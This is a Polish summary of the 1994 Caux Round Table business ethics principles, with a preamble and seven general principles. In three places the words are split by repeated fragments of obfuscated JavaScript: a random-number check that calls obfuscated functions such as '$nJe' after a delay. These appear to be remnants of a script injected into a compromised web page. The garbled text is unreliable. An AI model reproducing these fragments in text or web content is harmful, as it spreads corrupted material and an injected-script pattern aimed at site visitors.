Zasady prowadzenia działalności gospodarczej przyjęte podczas obrad Okrągłego Sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tołu z Caux opublikowane w 1994 r. 

ZASADY CAUX

Preambuła

Zasady opierają się na dwu ideałach etycznych: japońskim kyosei (symbioza) i europejskim poszanowaniu godności człowieka.

Zasady ogólne
1. Odpowiedzialność w prowadzeniu działalności gospodarczej: od odpowiedzialności wobec akcjonariuszy ku odpowiedzialności wobec interesariuszy.
2. Ekonomiczne i społeczne oddziaływanie biznesu; ku innowacjom, sprawiedliwości i wspólnocie świadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towej.
3. Postępowanie w biznesie: wyjście poza literę prawa ku duchowi zaufania.
4. Poszanowanie reguł prawnych.
5. Wspieranie wielostronnej wymiany hdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andlowej.
6. Szacunek dla środowiska naturalnego.
7. Unikanie działań sprzecznych z prawem.